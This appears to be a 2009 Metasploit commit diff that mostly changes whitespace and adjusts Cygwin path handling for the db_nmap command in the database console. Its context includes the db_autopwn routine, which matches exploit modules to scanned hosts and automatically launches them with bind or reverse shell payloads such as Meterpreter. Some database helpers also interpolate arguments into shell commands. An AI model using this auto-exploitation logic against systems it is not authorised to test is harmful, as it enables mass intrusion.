Expand to a windows path if the exe is outside of the cygwin installation

git-svn-id: file:///home/svn/framework3/trunk@7375 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-11-06 16:01:24 +00:00
parent 48fb445609
commit 4fde76e8f6
1 changed files with 135 additions and 134 deletions

View File

@ -32,7 +32,7 @@ class NmapXMLStreamParser
end
def tag_end(name)
case name
case name
when "host"
host = framework.db.get_host(nil, @addr)
if not host
@ -72,7 +72,7 @@ class Db
require 'tempfile'
include Msf::Ui::Console::CommandDispatcher
#
# Constants
#
@ -83,7 +83,7 @@ class Db
PWN_EXPL = 2**3
PWN_SING = 2**4
PWN_SLNT = 2**5
#
# The dispatcher's name.
#
@ -120,7 +120,7 @@ class Db
"db_import_nmap_xml" => "Import a Nmap scan results file (-oX)",
"db_nmap" => "Executes nmap and records the output automatically",
}
framework.db.active ? base.merge(more) : base
end
@ -132,23 +132,23 @@ class Db
def cmd_db_services(*args)
framework.db.each_service do |service|
print_status("Time: #{service.created} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state} name=#{service.name}")
print_status("Time: #{service.created} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state} name=#{service.name}")
end
end
end
def cmd_db_vulns(*args)
framework.db.each_vuln do |vuln|
reflist = vuln.refs.map { |r| r.name }
print_status("Time: #{vuln.created} Vuln: host=#{vuln.host.address} port=#{vuln.service.port} proto=#{vuln.service.proto} name=#{vuln.name} refs=#{reflist.join(',')}")
end
end
end
def cmd_db_notes(*args)
framework.db.each_note do |note|
print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
end
end
end
def cmd_db_add_host(*args)
print_status("Adding #{args.length} hosts...")
args.each do |address|
@ -165,10 +165,10 @@ class Db
host = framework.db.get_host(nil, args[0])
return if not host
service = framework.db.get_service(nil, host, args[2].downcase, args[1].to_i)
return if not service
print_status("Time: #{service.created} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state}")
end
@ -189,20 +189,20 @@ class Db
return
end
naddr = args.shift
naddr = args.shift
ntype = args.shift
ndata = args.join(" ")
host = framework.db.get_host(nil, naddr)
return if not host
note = framework.db.get_note(nil, host, ntype, ndata)
return if not note
print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
end
def cmd_db_del_host(*args)
args.each do |address|
if framework.db.del_host(nil, address)
@ -223,15 +223,15 @@ class Db
code = :bind
mjob = 5
regx = nil
port_inc = []
port_exc = []
targ_inc = []
targ_exc = []
args.push("-h") if args.length == 0
while (arg = args.shift)
case arg
when '-t'
@ -284,12 +284,12 @@ class Db
end
matches = {}
[ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype|
[ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype|
# Scan all exploit modules for matching references
mtype[0].each_module do |n,m|
e = m.new
#
# Match based on vulnerability references
#
@ -299,7 +299,7 @@ class Db
ref_name = r.ctx_id + '-' + r.ctx_val
ref = framework.db.has_ref?(ref_name)
if (ref)
ref.vulns.each do |vuln|
vcnt += 1
@ -313,7 +313,7 @@ class Db
next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i))
next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i))
next if (regx and e.fullname !~ /#{regx}/)
matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true
end
end
@ -326,23 +326,23 @@ class Db
if (mode & PWN_PORT != 0)
rports = {}
rservs = {}
if(e.datastore['RPORT'])
rports[e.datastore['RPORT'].to_s] = true
end
if(e.respond_to?('autofilter_ports'))
e.autofilter_ports.each do |rport|
rports[rport.to_s] = true
rports[rport.to_s] = true
end
end
if(e.respond_to?('autofilter_services'))
e.autofilter_services.each do |serv|
rservs[serv] = true
rservs[serv] = true
end
end
end
framework.db.services.each do |serv|
next if not serv.host
@ -361,7 +361,7 @@ class Db
matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true
end
# Match service names
# Match service names
rservs.keys.sort.each do |rserv|
next if serv.name.to_s != rserv
xport = serv.port
@ -374,9 +374,9 @@ class Db
next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i))
next if (regx and e.fullname !~ /#{regx}/)
matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true
end
end
end
end
end
end
end
@ -384,13 +384,13 @@ class Db
if (mode & PWN_SHOW != 0)
print_status("Analysis completed in #{(Time.now.to_f - stamp)} seconds (#{vcnt} vulns / #{rcnt} refs)")
end
idx = 0
matches.each_key do |xref|
idx += 1
begin
mod = nil
@ -402,7 +402,7 @@ class Db
if (mode & PWN_SHOW != 0)
print_status("Matched #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...")
end
#
# The code is just a proof-of-concept and will be expanded in the future
#
@ -419,41 +419,41 @@ class Db
mod.datastore['PAYLOAD'] = 'generic/shell_bind_tcp'
end
end
if (code == :conn)
mod.datastore['LHOST'] = Rex::Socket.source_address(xref[2])
mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s
if (mod.datastore['LHOST'] == '127.0.0.1')
print_status("Failed to determine listener address for target #{xref[2]}...")
next
end
if(mod.fullname =~ /\/windows\//)
mod.datastore['PAYLOAD'] = 'windows/meterpreter/reverse_tcp'
else
mod.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
end
end
if(framework.jobs.keys.length >= mjob)
print_status("Job limit reached, waiting on modules to finish...")
while(framework.jobs.keys.length >= mjob)
select(nil, nil, nil, 0.25)
end
end
next if not mod.autofilter()
print_status("(#{idx}/#{matches.length}): Launching #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...")
begin
inp = (mode & PWN_SLNT != 0) ? nil : driver.input
out = (mode & PWN_SLNT != 0) ? nil : driver.output
case mod.type
when MODULE_EXPLOIT
session = mod.exploit_simple(
@ -465,7 +465,7 @@ class Db
session = mod.run_simple(
'LocalInput' => inp,
'LocalOutput' => out,
'RunAsJob' => true)
'RunAsJob' => true)
end
rescue ::Interrupt
raise $!
@ -473,7 +473,7 @@ class Db
print_status(" >> autopwn exception during launch from #{xref[3]}: #{$!} ")
end
end
rescue ::Interrupt
raise $!
rescue ::Exception
@ -490,7 +490,7 @@ class Db
#
def handle_nessus(addr, port, nasl, data)
p = port.match(/^([^\(]+)\((\d+)\/([^\)]+)\)/)
return if not p
return if not p
host = framework.db.get_host(nil, addr)
return if not host
@ -551,12 +551,12 @@ class Db
print_status("Usage: db_import_nessus_nbe [nessus.nbe]")
return
end
if (not File.readable?(args[0]))
if (not File.readable?(args[0]))
print_status("Could not read the NBE file")
return
end
fd = File.open(args[0], 'r')
fd.each_line do |line|
r = line.split('|')
@ -570,10 +570,10 @@ class Db
end
fd.close
end
#
# Import Nessus NESSUS files
#
#
def cmd_db_import_nessus_xml(*args)
if (not (args and args.length == 1))
print_status("Usage: db_import_nessus_xml [nessus.nessus]")
@ -611,12 +611,12 @@ class Db
print_status("Usage: db_import_nmap_xml [nmap.xml]")
return
end
if (not File.readable?(args[0]))
if (not File.readable?(args[0]))
print_status("Could not read the XML file")
return
end
load_nmap_xml(args[0])
end
@ -628,11 +628,11 @@ class Db
print_status("Usage: db_nmap [nmap options]")
return
end
nmap =
Rex::FileUtils.find_full_path("nmap") ||
nmap =
Rex::FileUtils.find_full_path("nmap") ||
Rex::FileUtils.find_full_path("nmap.exe")
if(not nmap)
print_error("The nmap executable could not be found")
return
@ -641,16 +641,16 @@ class Db
fd = Tempfile.new('dbnmap')
# When executing native Nmap, expand the Cygwin path to a Win32 path
if(Rex::Compat.is_cygwin and nmap[0,1] != "/")
if(Rex::Compat.is_cygwin and nmap =~ /^cygdrive/)
args.push('-oX', IO.popen("cygpath -aw #{fd.path}").read.strip)
else
args.push('-oX', fd.path)
end
args.unshift(nmap)
cmd = args.map{|x| '"'+x+'"'}.join(" ")
print_status("exec: #{cmd}")
IO.popen( cmd ) do |io|
io.each_line do |line|
@ -659,7 +659,7 @@ class Db
end
load_nmap_xml(fd.path)
end
end
#
@ -669,7 +669,7 @@ class Db
l = NmapXMLStreamParser.new(framework)
REXML::Document.parse_stream(File.new(filename), l)
end
#
# Import from a THC-Amap machine-readable log file
#
@ -716,7 +716,7 @@ class Db
fd.close
end
#
# Determine if an IP address is inside a given range
#
@ -733,15 +733,15 @@ class Db
end
end
end
false
end
#
# Database management
#
def db_check_driver
if(not framework.db.driver)
print_error("No database driver has been specified")
@ -751,13 +751,13 @@ class Db
end
def cmd_db_driver(*args)
if(args[0])
if(args[0] == "-h")
print_status("Usage: db_driver [driver-name]")
return
end
if(framework.db.drivers.include?(args[0]))
framework.db.driver = args[0]
print_status("Using database driver #{args[0]}")
@ -766,7 +766,7 @@ class Db
end
return
end
if(framework.db.driver)
print_status(" Active Driver: #{framework.db.driver}")
else
@ -774,11 +774,11 @@ class Db
end
print_status(" Available: #{framework.db.drivers.join(", ")}")
end
def cmd_db_driver_tabs(str, words)
return framework.db.drivers
end
def cmd_db_create(*args)
return if not db_check_driver
meth = "db_create_#{framework.db.driver}"
@ -788,7 +788,7 @@ class Db
print_error("This database driver #{framework.db.driver} is not currently supported")
end
end
def cmd_db_destroy(*args)
return if not db_check_driver
meth = "db_destroy_#{framework.db.driver}"
@ -798,7 +798,7 @@ class Db
print_error("This database driver #{framework.db.driver} is not currently supported")
end
end
def cmd_db_connect(*args)
return if not db_check_driver
meth = "db_connect_#{framework.db.driver}"
@ -808,7 +808,7 @@ class Db
print_error("This database driver #{framework.db.driver} is not currently supported")
end
end
def cmd_db_disconnect(*args)
return if not db_check_driver
meth = "db_disconnect_#{framework.db.driver}"
@ -819,12 +819,12 @@ class Db
end
end
#
# Database management: SQLite3
#
#
# Disconnect from the current SQLite3 instance
#
@ -854,26 +854,26 @@ class Db
end
print_status("Successfully connected to the database")
print_status("File: #{opts['dbfile']}")
print_status("File: #{opts['dbfile']}")
end
#
# Create a new SQLite database instance
#
#
def db_create_sqlite3(*args)
cmd_db_disconnect()
info = db_parse_db_uri_sqlite3(args[0])
opts = { 'adapter' => 'sqlite3' }
opts['dbfile'] = info[:path]
sql = ::File.join(Msf::Config.install_root, "data", "sql", "sqlite.sql")
if (::File.exists?(opts['dbfile']))
print_status("The specified database already exists, connecting")
else
print_status("Creating a new database instance...")
require_library_or_gem('sqlite3')
@ -886,11 +886,11 @@ class Db
end
db.close
end
if (not framework.db.connect(opts))
raise RuntimeError.new("Failed to connect to the database")
end
print_status("Successfully connected to the database")
print_status("File: #{opts['dbfile']}")
end
@ -913,11 +913,11 @@ class Db
res[:path] = path || ::File.join(Msf::Config.config_directory, 'sqlite3.db')
res
end
#
# Database management: MySQL
#
#
# Disconnect from the current MySQL instance
#
@ -933,7 +933,7 @@ class Db
def db_connect_mysql(*args)
info = db_parse_db_uri_mysql(args[0])
opts = { 'adapter' => 'mysql' }
opts['username'] = info[:user] if (info[:user])
opts['password'] = info[:pass] if (info[:pass])
opts['database'] = info[:name]
@ -945,7 +945,7 @@ class Db
if (opts['host'].strip.downcase == 'localhost')
opts['host'] = Socket.gethostbyname("localhost")[3].unpack("C*").join(".")
end
if (not framework.db.connect(opts))
raise RuntimeError.new("Failed to connect to the database")
end
@ -953,37 +953,37 @@ class Db
#
# Create a new MySQL database instance
#
#
def db_create_mysql(*args)
cmd_db_disconnect()
info = db_parse_db_uri_mysql(args[0])
opts = { 'adapter' => 'mysql' }
argv = []
if (info[:user])
opts['username'] = info[:user]
opts['username'] = info[:user]
argv.push('-u')
argv.push(info[:user])
end
if (info[:pass])
argv.push('--password=' + info[:pass])
opts['password'] = info[:pass]
opts['password'] = info[:pass]
end
if (info[:host])
opts['host'] = info[:host]
argv.push('-h')
argv.push(info[:host])
end
if (info[:port])
opts['port'] = info[:port]
argv.push('-P')
argv.push(info[:port])
# This is an ugly hack for a broken MySQL adapter:
# http://dev.rubyonrails.org/ticket/3338
if (opts['host'].strip.downcase == 'localhost')
@ -992,14 +992,14 @@ class Db
end
argv.push('-f')
opts['database'] = info[:name]
cargs = argv.map{|c| "'#{c}' "}.join
sql = File.join(Msf::Config.install_root, "data", "sql", "mysql.sql")
fd = File.open(sql, 'r')
system("mysqladmin #{cargs} drop #{info[:name]} >/dev/null 2>&1")
system("mysqladmin #{cargs} create #{info[:name]}")
@ -1007,7 +1007,7 @@ class Db
psql.write(fd.read)
psql.close
fd.close
print_status("Database creation complete (check for errors)")
if (not framework.db.connect(opts))
@ -1025,32 +1025,32 @@ class Db
info = db_parse_db_uri_mysql(args[0])
argv = []
if (info[:user])
argv.push('-u')
argv.push(info[:user])
end
if (info[:pass])
argv.push('--password=' + info[:pass])
end
if (info[:host])
argv.push('-h')
argv.push(info[:host])
end
if (info[:port])
argv.push('-P')
argv.push(info[:port])
end
argv.push("-f")
cargs = argv.map{|c| "'#{c}' "}.join
system("mysqladmin -f #{cargs} drop #{info[:name]}")
end
def db_parse_db_uri_mysql(path)
res = {}
if (path)
@ -1064,7 +1064,7 @@ class Db
res[:name] = name || 'metasploit3'
res
end
#
# Database management: Postgres
#
@ -1089,7 +1089,7 @@ class Db
opts['database'] = info[:name]
opts['host'] = info[:host] if (info[:host])
opts['port'] = info[:port] if (info[:port])
if (not framework.db.connect(opts))
raise RuntimeError.new("Failed to connect to the database")
end
@ -1097,16 +1097,16 @@ class Db
#
# Create a new Postgres database instance
#
#
def db_create_postgresql(*args)
cmd_db_disconnect()
info = db_parse_db_uri_postgresql(args[0])
opts = { 'adapter' => 'postgresql' }
argv = []
if (info[:user])
opts['username'] = info[:user]
opts['username'] = info[:user]
argv.push('-U')
argv.push(info[:user])
else
@ -1121,26 +1121,26 @@ class Db
print()
argv.push('-W')
end
if (info[:host])
opts['host'] = info[:host]
argv.push('-h')
argv.push(info[:host])
end
if (info[:port])
opts['port'] = info[:port]
argv.push('-p')
argv.push(info[:port])
end
opts['database'] = info[:name]
cargs = argv.map{|c| "'#{c}' "}.join
sql = File.join(Msf::Config.install_root, "data", "sql", "postgres.sql")
fd = File.open(sql, 'r')
system("dropdb #{cargs} #{info[:name]} >/dev/null 2>&1")
system("createdb #{cargs} #{info[:name]}")
@ -1148,7 +1148,7 @@ class Db
psql.write(fd.read)
psql.close
fd.close
print_status("Database creation complete (check for errors)")
if (not framework.db.connect(opts))
@ -1165,24 +1165,24 @@ class Db
info = db_parse_db_uri_postgresql(args[0])
argv = []
if (info[:user])
argv.push('-U')
argv.push(info[:user])
end
if (info[:pass])
print()
print_status("Warning: You will need to enter the password at the prompts below")
print()
argv.push('-W')
end
if (info[:host])
argv.push('-h')
argv.push(info[:host])
end
if (info[:port])
argv.push('-p')
argv.push(info[:port])
@ -1191,7 +1191,7 @@ class Db
cargs = argv.map{|c| "'#{c}' "}.join
system("dropdb #{cargs} #{info[:name]}")
end
def db_parse_db_uri_postgresql(path)
res = {}
if (path)
@ -1205,9 +1205,10 @@ class Db
res[:name] = name || 'metasploit3'
res
end
end
end
end
end
end